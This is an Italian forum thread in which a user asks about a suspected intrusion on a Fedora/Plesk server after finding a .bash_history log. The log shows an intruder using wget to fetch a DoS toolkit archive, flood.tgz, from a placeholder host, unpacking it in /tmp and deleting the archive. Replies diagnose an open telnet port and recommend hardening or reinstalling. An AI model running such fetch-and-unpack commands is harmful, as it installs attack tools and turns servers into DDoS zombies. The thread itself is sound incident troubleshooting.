Probabile intrusione server Fedora? Flood.tgz

[PazZII]

Salve,
premesso che di linux non ci capisco molto, oggi stavo tranquillamente girellando dentro il server di un mio cliente (Fedora con Plesk) per controllare un paio di cose quando dentro la cartella

/home/xxxxxx/ (xxxxxx è il nome di una persona)

ho trovato un file nominato .bash_history che conteneva il seguente codice

Codice PHP:

w
uname -a
uname -s
wget
cd /tmp
ls
wget nome.diunsito.com/flood.tgz
tar -xvzf flood.tgz
rm -rf flood.tgz
e
cd
exit 


Ho provato a vedere un pò qualcosa in merito al file Flood.tgz e ho trovato che...

After successfully exploiting the Samba server, the remote intruder gained the root privilege and installed a rootkit wrapper rkzz.tgz, which contains a trojaned sshd backdoor and a sniffer program. Once the sshd backdoor was installed, the intruder quickly created an ssh connection using PuTTY-0.53b, encrypting all subsequent traffic. Using the ssh connection, the intruder downloaded a program package skk.tgz, which is the SucKit rootkit. It seemed that SucKit could not be installed successfully in the UML, so the intruder downloaded another attack package, flood.tgz , and immediately started a DoS attack. The attack package contained several DoS attack tools, including the infamous smurf, overdrop, and synsend.

Tempo fa la stessa macchina, a detta di un collaboratore del mio cliente, guardando i log del firewall, produceva migliaia di richieste ai più disparati indirizzi IP e Porte raggiungibili...
Altri collaboratori in seguito hanno detto che era tutto sistemato...

Domande:
Mi spiegate che cosa fa il codice nel file .bash_history? (suppongo che scarichi il file e lo installi..)
Si può sapere chi lo ha fatto?
CHE COSA FA FLOOD.TGZ?
Che devo fare?
Mi preoccupo?
Mi inkakkio?
grrrr....

[smoking-man]

mi sa tanto che hai la 23 aperta e qualcuno ha fatto un giro con il nome dell'utente xxxx che ha una password troppo scema e ci ha messo il programmino per utilizzare il server per farsi uno zombie per attacchi ddos

[PazZII]

sì, la 23 è aperta.
Bene...

Ovviamente le persone che hanno fatto il lavoro (sono 3 mesi che gli diciamo che questa macchina è bucata) o prendono per il kulo o sono degli incapaci.
Questo è provato dal fatto che IO che non capisco na mazza di linux ho scoperto questa magagna.
E che comunque una macchina che fa migliaia e migliaia di richieste su altrettanti indirizzi IP al giorno è ovvio che sta facendo qualcosa che non va...e che quindi è bucata.

Che mi consigli di dire/fare?

[untamed]

Dovresti fare un po' di hardening della macchina, se non sei pratico di Linux e di iptables, potresti cominciare con qualche tool grafico, tipo firestarter o guarddog. Disabilita tutti i servizi non necessari.

[PazZII]

In teorie l'hardening era già stato fatto.
Porte aperte solo le indispensabili e firewall hardware della watchguard.
Ma ho dei grossi dubbi sulla sicurezza del Plesk.... e sulla competenza di certe persone.

Che casino.

[untamed]

Originariamente inviato da PazZII
In teorie l'hardening era già stato fatto.
Porte aperte solo le indispensabili e firewall hardware della watchguard.
Ma ho dei grossi dubbi sulla sicurezza del Plesk.... e sulla competenza di certe persone.

Che casino.

VVoVe:

Mooooolto in teoria, se hai la 23 aperta. Penso che dovresti lamentarti con i tipi che ti hanno fatto il "lavoro".

[PazZII]

lo sto facendo in questo preciso momento

[stai_tranquillo]

è bello vedere come la potenza di un sistema operativo si può ritorcere subito contro l'amministratore incapace.. godo a sapere queste cose, anche se nuocciono alla reputazione di linux in quanto nelle menti ignoranti può suscitare il collegamento linux --> insicuro


comunque, tornando al discorso..

se hai la possibilità di farli sbattere a casa a calci nel didietro (parlo dagli "amministratori" della macchina) fallo, perchè si è dimostrato incapace di operare, e oltretutto a quanto pare non sta nemmeno prendendo provvedimenti ora che tu gli hai segnalato un problema..

[PazZII]

Non so se stanno prendendo provvedimenti ma ora lo script da così

Codice PHP:

w 
uname -a 
uname -s 
wget 
cd /tmp 
ls 
wget nome.diunsito.com/flood.tgz 
tar -xvzf flood.tgz 
rm -rf flood.tgz 
e 
cd 
exit 


è diventato così...

Codice PHP:

w
uname -a
uname -s
wget
cd /tmp
ls
wget nome.diunsito.com/flood.tgz 
tar -xvzf flood.tgz
rm -rf flood.tgz
e
cd
exit
ls
cd ..
ls
exit 


eccheka..

[ame]

Sei hai un rootkit installato come presuppongo la macchina ormai è compromessa!vi conviene formattarla!ed affidarvi a qualcuno che di sicurezza sene intende veramente!